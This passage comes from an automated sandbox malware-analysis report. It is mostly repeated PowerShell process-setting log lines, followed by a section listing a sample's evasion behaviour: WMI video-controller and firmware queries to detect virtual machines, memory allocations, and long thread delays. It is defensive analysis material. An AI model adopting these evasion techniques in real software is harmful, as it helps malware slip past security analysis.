                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599877Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599512Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599221Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598436Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597108Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596871Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595712Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
